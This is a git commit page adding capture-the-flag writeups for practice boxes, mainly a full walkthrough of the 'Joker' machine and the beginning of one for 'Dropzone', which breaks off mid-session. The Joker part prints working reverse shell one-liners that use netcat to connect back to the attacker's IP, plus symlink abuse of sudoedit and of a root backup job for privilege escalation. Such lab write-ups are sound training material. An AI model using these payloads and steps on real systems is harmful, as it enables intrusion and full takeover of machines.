oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 04:16:59 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

add hacking blogposts as they are

Browse source
This commit is contained in:
oxeo0 2025-05-07 01:02:00 +02:00
parent fa65088be1
commit 325b9c3814
1904 changed files with 91353 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

66
Hard/0.md Normal file
View file

@ -0,0 +1,66 @@
# Writeup
![](img/0.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

462
Hard/1.md Normal file
View file

@ -0,0 +1,462 @@
# Joker Writeup
![](img/0.png)
## Introduction :
Joker is a hard linux box released back in May 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.21 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 22/tcp on 10.10.10.21
Discovered open port 3128/tcp on 10.10.10.21
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.37/23 ] [ /dev/pts/10 ] [~]
→ nmap -sCV 10.10.10.21 -Pn -p 22,3128
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:39 CEST
Nmap scan report for 10.10.10.21
Host is up (0.032s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
| 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~]
→ sudo nmap -sU 10.10.10.21 -p 69,5355
[sudo] password for nothing:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:53 CEST
Nmap scan report for 10.10.10.21
Host is up (0.028s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
5355/udp open|filtered llmnr
Nmap done: 1 IP address (1 host up) scanned in 1.62 second
## **Part 2 : Getting User Access**
The UDP scan picked up port 69 tftp so let's investigate it:
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
→ sudo pacman -S tftp-hpa
resolving dependencies...
looking for conflicting packages...
Packages (1) tftp-hpa-5.2-9
Total Download Size: 0,04 MiB
Total Installed Size: 0,09 MiB
:: Proceed with installation? [Y/n] y
:: Retrieving packages...
tftp-hpa-5.2-9-x86_64 37,8 KiB 1260 KiB/s 00:00 [###################################] 100%
(1/1) checking keys in keyring [###################################] 100%
(1/1) checking package integrity [###################################] 100%
(1/1) loading package files [###################################] 100%
(1/1) checking for file conflicts [###################################] 100%
(1/1) checking available disk space [###################################] 100%
:: Processing package changes...
(1/1) installing tftp-hpa [###################################] 100%
:: Running post-transaction hooks...
(1/2) Reloading system manager configuration...
(2/2) Arming ConditionNeedsUpdate...
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
→ tftp 10.10.10.21
tftp> get passwords
Recieved 48 bytes in 5.9 seconds
Once we have the passwords file we will use john to crack it using the rockyou.txt wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Once it's done we have the credentials we need : ihateseafood (kalamari) so now let's make use of port 3128 (squid proxy) using firefox
![](prg/1/001.png) ![](prg/1/002.png)
So that's one way of doing it, but we can also use foxyproxy to do that:
![](prg/1/003.png)
Once that's done, visiting http://127.0.0.1 redirects us to a login prompt (where we put in the credentials john found earlier) and we are greeted by a shorty-url webpage. So we enumerate it using dirb
![](prg/1/004.png)
[ 10.10.14.37/23 ] [ /dev/pts/14 ] [~]
→ dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 29 18:19:04 2020
URL_BASE: http://127.0.0.1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.21:3128
PROXY AUTHORIZATION: kalamari:ihateseafood
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/console (CODE:200|SIZE:1479)
now we visit http://127.0.0.1/console and we are greeted by a python interpreter into which we're going to inject our reverse shell. but before that we need to enumerate a bit:
>>> import os
>>> os.popen("whoami").read()
'werkzeug\n'
>>> os.popen("nc -h").read()
''
>>> os.popen("nc -h 2>&1").read()
'OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)\nThis is nc from the netcat-openbsd package. An alternative nc is available\nin the netcat-traditional package.\nusage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]\n\t [-P proxy_username] [-p source_port] [-q seconds] [-s source]\n\t [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]\n\t [-x proxy_address[:port]] [destination] [port]\n\tCommand Summary:\n\t\t-4\t\tUse IPv4\n\t\t-6\t\tUse IPv6\n\t\t-b\t\tAllow broadcast\n\t\t-C\t\tSend CRLF as line-ending\n\t\t-D\t\tEnable the debug socket option\n\t\t-d\t\tDetach from stdin\n\t\t-h\t\tThis help text\n\t\t-I length\tTCP receive buffer length\n\t\t-i secs\t\tDelay interval for lines sent, ports scanned\n\t\t-j\t\tUse jumbo frame\n\t\t-k\t\tKeep inbound sockets open for multiple connects\n\t\t-l\t\tListen mode, for inbound connects\n\t\t-n\t\tSuppress name/port resolutions\n\t\t-O length\tTCP send buffer length\n\t\t-P proxyuser\tUsername for proxy authentication\n\t\t-p port\t\tSpecify local port for remote connects\n \t-q secs\t\tquit after EOF on stdin and delay of secs\n\t\t-r\t\tRandomize remote ports\n\t\t-S\t\tEnable the TCP MD5 signature option\n\t\t-s addr\t\tLocal source address\n\t\t-T toskeyword\tSet IP Type of Service\n\t\t-t\t\tAnswer TELNET negotiation\n\t\t-U\t\tUse UNIX domain socket\n\t\t-u\t\tUDP mode\n\t\t-V rtable\tSpecify alternate routing table\n\t\t-v\t\tVerbose\n\t\t-w secs\t\tTimeout for connects and final net reads\n\t\t-X proto\tProxy protocol: "4", "5" (SOCKS) or "connect"\n\t\t-x addr[:port]\tSpecify proxy address and port\n\t\t-Z\t\tDCCP mode\n\t\t-z\t\tZero-I/O mode [used for scanning]\n\tPort numbers can be individual or ranges: lo-hi [inclusive]\n'
>>>
so here we see that netcat is here, and the flags we have here are **-46bCDdhjklnrStUuvZz** it is important to note that we do not have the -e flag so it's here that many other people who made the writeup of this box falsely claimed they could just use pentestmonkey's python reverse shell one liner because it contains the -e flag which is not here for netcat. So to go around this we'll use another reverse shell one liner :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f
Here it is important to add the & at the end because if this is not successful, the webservice will die on us and we would need to revert the box. This makes sure that the process runs in the background on another thread in order for us to keep using the box in case if it doesn't work.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &
Now here we are dealing with a python interpreter so we need to wrap our payload within the os.popopen("").read() command:
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &").read()
Sadly this doesn't work, and that is because there are iptables. We can see that here:
>>> os.popen("find /etc | grep iptables").read()
'/etc/iptables\n/etc/iptables/rules.v4\n/etc/iptables/rules.v6\n'
>>> os.popen("base64 -w 0 /etc/iptables/rules.v4").read()
'IyBHZW5lcmF0ZWQgYnkgaXB0YWJsZXMtc2F2ZSB2MS42LjAgb24gRnJpIE1heSAxOSAxODowMToxNiAyMDE3CipmaWx0ZXIKOklOUFVUIERST1AgWzQxNTczOjE4Mjk1OTZdCjpGT1JXQVJEIEFDQ0VQVCBbMDowXQo6T1VUUFVUIEFDQ0VQVCBbODc4OjIyMTkzMl0KLUEgSU5QVVQgLWkgZW5zMzMgLXAgdGNwIC1tIHRjcCAtLWRwb3J0IDIyIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCB0Y3AgLW0gdGNwIC0tZHBvcnQgMzEyOCAtaiBBQ0NFUFQKLUEgSU5QVVQgLWkgZW5zMzMgLXAgdWRwIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCBpY21wIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBsbyAtaiBBQ0NFUFQKLUEgT1VUUFVUIC1vIGVuczMzIC1wIHRjcCAtbSBzdGF0ZSAtLXN0YXRlIE5FVyAtaiBEUk9QCkNPTU1JVAojIENvbXBsZXRlZCBvbiBGcmkgTWF5IDE5IDE4OjAxOjE2IDIwMTcK'
>>>
then we decode it locally :
echo 'B64STRING' | base64 -d > iptables.v4
[ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
→ echo 'IyBHZW5lcmF0ZWQgYnkgaXB0YWJsZXMtc2F2ZSB2MS42LjAgb24gRnJpIE1heSAxOSAxODowMToxNiAyMDE3CipmaWx0ZXIKOklOUFVUIERST1AgWzQxNTczOjE4Mjk1OTZdCjpGT1JXQVJEIEFDQ0VQVCBbMDowXQo6T1VUUFVUIEFDQ0VQVCBbODc4OjIyMTkzMl0KLUEgSU5QVVQgLWkgZW5zMzMgLXAgdGNwIC1tIHRjcCAtLWRwb3J0IDIyIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCB0Y3AgLW0gdGNwIC0tZHBvcnQgMzEyOCAtaiBBQ0NFUFQKLUEgSU5QVVQgLWkgZW5zMzMgLXAgdWRwIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBlbnMzMyAtcCBpY21wIC1qIEFDQ0VQVAotQSBJTlBVVCAtaSBsbyAtaiBBQ0NFUFQKLUEgT1VUUFVUIC1vIGVuczMzIC1wIHRjcCAtbSBzdGF0ZSAtLXN0YXRlIE5FVyAtaiBEUk9QCkNPTU1JVAojIENvbXBsZXRlZCBvbiBGcmkgTWF5IDE5IDE4OjAxOjE2IDIwMTcK' | base64 -d > iptables.v4
[ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
→ nano iptables.v4
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017
And here we see the problem, because we can only use a few ports for tcp (22 and 3128) , and the box accepts icmp (ping requests) as well as udp. So the easiest way to do it from here, is to spawn a reverse shell on a udp port instead of tcp.
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.13 9002 >/tmp/f &").read()
and of course, to recieve the reverse shell, we also need the -u flag on our end to make sure it is on our udp port:
nc -u -lvnp 9002
` ![](prg/1/006.png)
Now that we got our reverse shell, we are logged in as the user "werkzeug", we will first of all upgrade our reverse shell to a fully interactive shell:
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
→ nc -u -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.21] 48079
/bin/sh: 0: can't access tty; job control turned off
$ which bash
/bin/bash
$ which bash sh curl wget python python3
/bin/bash
/bin/sh
/usr/bin/curl
/usr/bin/wget
/usr/bin/python
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
werkzeug@joker:~$ ^Z
[1] + 18172 suspended nc -u -lvnp 9002
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
→ stty raw -echo ; fg
[1] + 18172 continued nc -u -lvnp 9002
export TERM=screen-256color
werkzeug@joker:~$ export SHELL=bash
werkzeug@joker:~$ stty rows 50 columns 200
werkzeug@joker:~$ reset
This reverse shell is very glitchy due to the use of the UDP protocol so make sure to press enter in between each previous step to make sure you get output.
Now we could run a privesc script to find the vulnerabilities for us, but it is a fairly simple one, we just type sudo -l
![](prg/1/009.png)
and here we see what this box is about, the user we are logged in as (werkzeug) may run the sudoedit command on joker as the user alekos on /var/www/*/*/layout.html
if we run dpkg -l sudo :
![](prg/1/010.png)
We see that sudo is version 1.8.16.0 and if we run a searchsploit command on this, we see that there is an exploit for it (namely 11651.sh and 37710.txt)
So the idea here is, that you can take advantage of this wildcard vulnerability in sudo using symlinks and therefore being able to edit files that you are not supposed to be able to edit. Namely the authorized_key file in root's .ssh directory to put our public key in:
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
→ cat ~/.ssh/mahakaliVM.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
[terminal 2]
werkzeug@joker:~/testing/nihilist$ ln -s /home/alekos/.ssh/authorized_keys layout.html
werkzeug@joker:~/testing/nihilist$ ls -lash
total 8.0K
4.0K drwxrwxr-x 2 werkzeug werkzeug 4.0K Jul 6 22:31 .
4.0K drwxr-xr-x 3 werkzeug werkzeug 4.0K Jul 6 22:30 ..
0 lrwxrwxrwx 1 werkzeug werkzeug 33 Jul 6 22:31 layout.html -> /home/alekos/.ssh/authorized_keys
werkzeug@joker:~/testing/nihilist$ sudoedit -u alekos /var/www/testin/nihilistlayout.html
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
werkzeug@joker:~/testing/nihilist$cat layout.html
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
Now that our public key is in alekos's authorized_keys file, let's ssh as alekos:
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
→ ssh alekos@10.10.10.21 -i ~/.ssh/mahakaliVM
The authenticity of host '10.10.10.21 (10.10.10.21)' can't be established.
ECDSA key fingerprint is SHA256:1yj4blzJwO5TYIZYFB3HMwXEqeflHc2iF1Idp3lZ94k.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.21' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Sat May 20 16:38:08 2017 from 10.10.13.210
alekos@joker:~$ id
uid=1001(alekos) gid=1001(alekos) groups=1001(alekos),1000(werkzeug)
alekos@joker:~$ ls -l
total 20
drwxrwx--- 2 root alekos 12288 Jul 6 22:40 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ cat user.txt
a2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We managed to get the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc to root on this box we're going to take a look at alekos's files:
alekos@joker:~$ ls -lash backup/
total 336K
12K drwxrwx--- 2 root alekos 12K Jul 6 22:45 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K May 19 2017 ..
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
here we see that a backup is being made every 5 minutes by the root user. So let's extract one of these backups to see what it does:
alekos@joker:~/backup$ mkdir extract
alekos@joker:~/backup$ cd extract
alekos@joker:~/backup/extract$ cp ../dev-1625601001.tar.gz .
alekos@joker:~/backup/extract$ gunzip -d dev-1625601001.tar.gz
gzip: dev-1625601001.tar.gz: not in gzip format
alekos@joker:~/backup/extract$ ls -l
total 40
-rw-r----- 1 alekos alekos 40960 Jul 6 22:50 dev-1625601001.tar.gz
alekos@joker:~/backup/extract$ file dev-1625601001.tar.gz
dev-1625601001.tar.gz: POSIX tar archive (GNU)
alekos@joker:~/backup/extract$ tar -xvf dev-1625601001.tar.gz
__init__.py
application.py
data/
data/shorty.db
models.py
static/
static/style.css
templates/
templates/layout.html
templates/not_found.html
templates/list.html
templates/display.html
templates/new.html
utils.py
views.py
alekos@joker:~/backup/extract$ ls -lash ../../development/
total 36K
4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:50 ..
4.0K -rw-r----- 1 alekos alekos 1.5K May 18 2017 application.py
4.0K drwxrwx--- 2 alekos alekos 4.0K May 18 2017 data
0 -rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
4.0K -rw-r----- 1 alekos alekos 997 May 18 2017 models.py
4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 static
4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 templates
4.0K -rw-r----- 1 alekos alekos 2.5K May 18 2017 utils.py
4.0K -rw-r----- 1 alekos alekos 1.8K May 18 2017 views.py
alekos@joker:~/backup/extract$
And here we see that basically there is a backup of the development folder that's being made every 5 minutes. So we basically make a symbolic link to /root/ so that the next backup that's being made is going to be that of the **/root/** directory where the root flag is.
alekos@joker:~$ date
Tue Jul 6 22:53:48 EEST 2021
alekos@joker:~$ ls -l
total 20
drwxrwx--- 3 root alekos 12288 Jul 6 22:50 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ mv development/ dev.bak
alekos@joker:~$ ln -s /root/ development
alekos@joker:~$ ls -lash
total 52K
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 .
4.0K drwxr-xr-x 3 root root 4.0K May 16 2017 ..
12K drwxrwx--- 3 root alekos 12K Jul 6 22:50 backup
0 -rw------- 1 root root 0 May 17 2017 .bash_history
4.0K -rw-r--r-- 1 alekos alekos 220 May 16 2017 .bash_logout
4.0K -rw-r--r-- 1 alekos alekos 3.7K May 16 2017 .bashrc
4.0K drwx------ 2 alekos alekos 4.0K May 17 2017 .cache
4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 dev.bak
0 lrwxrwxrwx 1 alekos alekos 6 Jul 6 22:54 development -> /root/
4.0K drwxr-xr-x 2 alekos alekos 4.0K May 17 2017 .nano
4.0K -rw-r--r-- 1 alekos alekos 655 May 16 2017 .profile
4.0K drwxr-xr-x 2 alekos alekos 4.0K May 20 2017 .ssh
4.0K -r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ date
Tue Jul 6 22:54:13 EEST 2021
We wait for the next backup to happen, and then we extract it:
alekos@joker:~$ date
Tue Jul 6 22:55:19 EEST 2021
alekos@joker:~$ cd backup/
alekos@joker:~/backup$ ls -lash
total 392K
12K drwxrwx--- 3 root alekos 12K Jul 6 22:55 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 ..
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:50 dev-1625601001.tar.gz
12K -rw-r----- 1 root alekos 10K Jul 6 22:55 dev-1625601301.tar.gz
4.0K drwxrwxr-x 5 alekos alekos 4.0K Jul 6 22:51 extract
alekos@joker:~/backup$ tar -xvf dev-1625601301.tar.gz
backup.sh
root.txt
alekos@joker:~/backup$ cat root.txt
d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We got the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/0_graph.png)

683
Hard/10.md Normal file
View file

@ -0,0 +1,683 @@
# Dropzone Writeup
![](img/10.png)
## Introduction :
Dropzone is a hard windows box released back in May 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.90 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 69/udp on 10.10.10.90
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~]
→ sudo nmap -sU -p69 -sCV -Pn 10.10.10.90
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 09:45 CET
Nmap scan report for 10.10.10.90
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
69/udp open tftp SolarWinds Free tftpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
## **Part 2 : Getting User Access**
So we know that we have tftp port opened, now let's enumerate it:
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ tftp 10.10.10.90
tftp> get /windows
Error code 1: Access to the path 'C:\windows' is denied.
tftp> get /%USERNAME%
Error code 1: Could not find file 'C:\%USERNAME%'.
tftp> get /windows/system32/config/SAM
Error code 1: The process cannot access the file 'C:\windows\system32\config\SAM' because it is being used by another process.
tftp> get /Documents and Settings
tftp: Documents: Is a directory
Error code 1: Could not find file 'C:\and'.
Error code 1: Could not find file 'C:\Settings'.
tftp>
tftp> get 'Documents and Settings'
Error code 1: Could not find file 'C:\'Documents'.
Error code 1: Could not find file 'C:\and'.
Error code 1: Could not find file 'C:\Settings''.
tftp> get "Documents and Settings"
Error code 0: Bailing out to bad characters in filename: '"Documents'.
Error code 1: Could not find file 'C:\and'.
Error code 0: Bailing out to bad characters in filename: 'Settings"'.
tftp>
Here we see a few things, first of all this is a windows machine because the first error tells us that the path C:\Windows exists but it's access is denied. Second of all, it looks like we cannot access the Documents and settings folder even when we wrap it in '' or "". This is because on older windows machines, there could not be long filenames, therefore the folder names would be 6 characters long and the number of whatever folder would match these first 8 letters like so:
tftp> get Docume~1
Error code 1: Access to the path 'C:\Documents and Settings' is denied.
tftp> get Docume~1/Admini~1
Error code 1: Access to the path 'C:\Documents and Settings\Administrator' is denied.
tftp>
As you can see, we write the first 6 characters and then ~1 to find the first folder that matches these first 6 characters, and we found the directories we wanted. now let's check if this is a 32bit or a 64bit machine by checking if the Program Files x86 folder exists (which would mean that the Program Files folder is the 64bit folder):
tftp> get /Progra~1
Error code 1: Access to the path 'C:\Program Files' is denied.
tftp> get /Progra~2
Error code 1: Could not find file 'C:\Progra~2'.
tftp>
And here we can see that there is only the Program Files folder, therefore it is safe to assume that this is a 32bit windows machine, and most probably windows XP. From here, we're going to use metasploit's psexec module:
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ locate psexec | grep metasploit
/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/ms17_010_psexec.md
/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.md
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/current_user_psexec.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb
/usr/share/metasploit-framework/tools/exploit/psexec.rb
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ cp /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb .
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ vim psexec.rb
And let's inspect what it does:
![](prg/10/1.png)
Here we're going to check the powershell part because older windows machines didn't have powershell, which is why most people stepped into a rabbithole by not inspecting what the exploit did exactly, so we're going to check what that execute_powershell_payload function does by looking at where it is actually defined:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ locate psexec | grep metasploit | xargs grep execute_powershell
**/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb: def execute_powershell_payload**
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
So here we see the function is defined in the first result:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ cp /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb .
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ nano psexec.rb
And here it is, so first of all this function executes cmd_psh_payload() which takes in 2 arguements, payload.encoded and the architecture (x86 or x64):
def execute_powershell_payload
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
Now let's generate this cmd_psh_payload() from metasploit's interactive ruby (which is like a debugger feature)
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.22-dev ]
+ -- --=[ 2086 exploits - 1126 auxiliary - 354 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
msf6 > search psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
2 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
3 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
